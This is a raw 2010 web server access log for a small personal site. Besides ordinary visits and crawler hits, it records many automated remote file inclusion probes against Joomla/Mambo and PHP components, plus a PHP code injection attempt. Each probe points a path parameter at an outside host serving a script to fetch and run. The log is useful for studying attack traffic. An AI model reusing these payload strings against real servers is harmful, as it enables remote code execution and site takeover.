96.230.240.226 - - [16/Apr/2010:00:33:05 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:33:05 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:33:05 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:33:05 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:33:23 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:33:23 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:33:23 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:33:23 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
207.46.199.44 - - [16/Apr/2010:00:33:29 -0500] "GET /logs/access_log.1230681600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
96.230.240.226 - - [16/Apr/2010:00:33:30 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:33:30 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:33:42 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
116.122.36.61 - - [16/Apr/2010:00:34:13 -0500] "GET /logs//com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:00:34:13 -0500] "GET /logs/access_log.1214006400//com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:00:34:13 -0500] "GET //com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:00:34:45 -0500] "GET //com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:00:34:45 -0500] "GET /logs/access_log.1214006400//com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:00:34:45 -0500] "GET /logs//com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:00:35:22 -0500] "GET /logs/access_log.1214006400//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:00:35:22 -0500] "GET //components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:00:35:22 -0500] "GET /logs//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:00:35:23 -0500] "GET /logs//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:00:35:23 -0500] "GET //components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:00:35:23 -0500] "GET /logs/access_log.1214006400//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:00:36:26 -0500] "GET //components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:00:36:26 -0500] "GET /logs//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:00:36:26 -0500] "GET /logs/access_log.1214006400//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
220.181.7.104 - - [16/Apr/2010:00:36:33 -0500] "GET / HTTP/1.1" 200 1003 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
207.46.199.33 - - [16/Apr/2010:00:38:21 -0500] "GET /artwork/jewelrybox.htm HTTP/1.1" 200 827 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4325; .NET CLR 2.0.40607; .NET CLR 3.0.04506.648)"
222.236.47.182 - - [16/Apr/2010:00:39:17 -0500] "GET ///////////components/com_mambowiki/%20MamboLogin.php?IP=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:00:39:17 -0500] "GET /logs///////////components/com_mambowiki/%20MamboLogin.php?IP=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:00:39:17 -0500] "GET /logs/access_log.1219708800///////////components/com_mambowiki/%20MamboLogin.php?IP=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:00:44:01 -0500] "GET /logs/access_log.1268265600%20%20//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:00:44:01 -0500] "GET /logs//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:00:44:01 -0500] "GET //components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:00:44:41 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:00:44:41 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:00:44:42 -0500] "GET /logs/access_log.1219708800//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:00:45:42 -0500] "GET //components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:00:45:42 -0500] "GET /logs//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:00:45:42 -0500] "GET /logs/access_log.1268265600%20%20//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:00:45:52 -0500] "GET /logs/access_log.1219708800%20%20///////////components/com_mambowiki/%20MamboLogin.php?IP=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
212.241.251.224 - - [16/Apr/2010:00:46:50 -0500] "GET /logs/access_log.1267920000%20%20////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
212.241.251.224 - - [16/Apr/2010:00:46:51 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
212.241.251.224 - - [16/Apr/2010:00:46:51 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 1955 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:00:47:05 -0500] "GET /logs//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:00:47:05 -0500] "GET /logs/access_log.1266710400//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:00:47:05 -0500] "GET //components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:48:15 -0500] "GET /logs//com_bsq_sitestats/external/rssfeed.php?baseDir=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:48:15 -0500] "GET //com_bsq_sitestats/external/rssfeed.php?baseDir=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 323 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:48:16 -0500] "GET /logs/access_log.1266710400//com_bsq_sitestats/external/rssfeed.php?baseDir=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 350 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:48:37 -0500] "GET /logs/access_log.1266710400//com_bsq_sitestats/external/rssfeed.php?baseDir=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 350 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:48:37 -0500] "GET //com_bsq_sitestats/external/rssfeed.php?baseDir=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 323 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:48:37 -0500] "GET /logs//com_bsq_sitestats/external/rssfeed.php?baseDir=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:48:38 -0500] "GET /logs//com_bsq_sitestats/external/rssfeed.php?baseDir=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:48:38 -0500] "GET //com_bsq_sitestats/external/rssfeed.php?baseDir=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 323 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:48:38 -0500] "GET /logs/access_log.1266710400//com_bsq_sitestats/external/rssfeed.php?baseDir=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 350 "-""Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:00:50:13 -0500] "GET /logs///////////components/com_mambowiki/%20MamboLogin.php?IP=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:00:50:13 -0500] "GET ///////////components/com_mambowiki/%20MamboLogin.php?IP=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:00:50:13 -0500] "GET /logs/access_log.1219708800///////////components/com_mambowiki/%20MamboLogin.php?IP=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:00:53:35 -0500] "GET //components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:00:53:35 -0500] "GET /logs//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:00:53:35 -0500] "GET /logs/access_log.1268265600%20%20//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:00:56:12 -0500] "GET /logs/access_log.1219708800%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:00:56:12 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:00:56:12 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:00:56:22 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:00:56:23 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:00:56:23 -0500] "GET /logs/access_log.1219708800%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:58:21 -0500] "GET /logs//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 334 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:58:21 -0500] "GET /logs/access_log.1223856000//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 356 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:58:21 -0500] "GET //components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 329 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:58:42 -0500] "GET /logs//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 334 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:58:42 -0500] "GET //components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 329 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:58:42 -0500] "GET /logs/access_log.1223856000//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 356 "-""Mozilla/5.0"
207.46.204.235 - - [16/Apr/2010:00:59:29 -0500] "GET /logs/access_log.1220140800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.200.89.25 - - [16/Apr/2010:01:00:02 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:01:00:02 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:01:00:02 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:01:00:04 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:01:00:12 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:01:00:12 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
66.249.71.153 - - [16/Apr/2010:01:00:13 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
222.236.47.182 - - [16/Apr/2010:01:01:07 -0500] "GET /logs/access_log.1219708800%20%20///////////components/com_mambowiki/%20MamboLogin.php?IP=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
78.110.50.121 - - [16/Apr/2010:01:03:23 -0500] "GET /logs//component/page,shop.ask/flypage,flypage.tpl/product_id,5/category_id,2/option,com_virtuemart/Itemid,12//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.kadiningucu.org//components/com_fabrik/libs/Blowfish/com_null/test.txt???? HTTP/1.1" 404 444 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
78.110.50.121 - - [16/Apr/2010:01:03:24 -0500] "GET //component/page,shop.ask/flypage,flypage.tpl/product_id,5/category_id,2/option,com_virtuemart/Itemid,12//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.kadiningucu.org//components/com_fabrik/libs/Blowfish/com_null/test.txt???? HTTP/1.1" 404 439 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
222.236.47.182 - - [16/Apr/2010:01:04:55 -0500] "GET /logs//com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:01:04:56 -0500] "GET /logs/access_log.1262822400//com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:01:04:56 -0500] "GET /logs/access_log.1259020800//com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:01:04:56 -0500] "GET //com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
207.46.199.199 - - [16/Apr/2010:01:05:08 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.78.238.157 - - [16/Apr/2010:01:08:05 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 317 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:08:05 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:08:05 -0500] "GET /logs/access_log.1220054400%20%20//modules/agendax/addevent.inc.php?agendax_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 346 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:08:11 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 317 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:08:11 -0500] "GET /logs/access_log.1220054400%20%20//modules/agendax/addevent.inc.php?agendax_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 346 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:08:11 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:09:40 -0500] "GET //shoutbox/expanded.php?conf=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 306 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:09:40 -0500] "GET /logs//shoutbox/expanded.php?conf=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 311 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:09:40 -0500] "GET /logs/access_log.1262822400//shoutbox/expanded.php?conf=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 333 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:09:40 -0500] "GET /logs/access_log.1266710400//shoutbox/expanded.php?conf=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 333 "-""Mozilla/5.0"
66.249.71.153 - - [16/Apr/2010:01:14:23 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3957 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.78.238.157 - - [16/Apr/2010:01:14:41 -0500] "GET /logs/access_log.1220054400//modules/agendax/addevent.inc.php?agendax_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 344 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:20:55 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 331 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:20:55 -0500] "GET /logs/access_log.1230076800//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 358 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:20:55 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:21:13 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 331 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:21:13 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:21:13 -0500] "GET /logs/access_log.1230076800//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 358 "-""Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:01:21:35 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:01:21:35 -0500] "GET /logs/access_log.1268611200%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:01:21:35 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:01:21:46 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:01:21:46 -0500] "GET /logs/access_log.1268611200%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:21:48 -0500] "GET /logs/access_log.1219536000//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 358 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:21:55 -0500] "GET /logs/access_log.1219536000//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 358 "-""Mozilla/5.0"
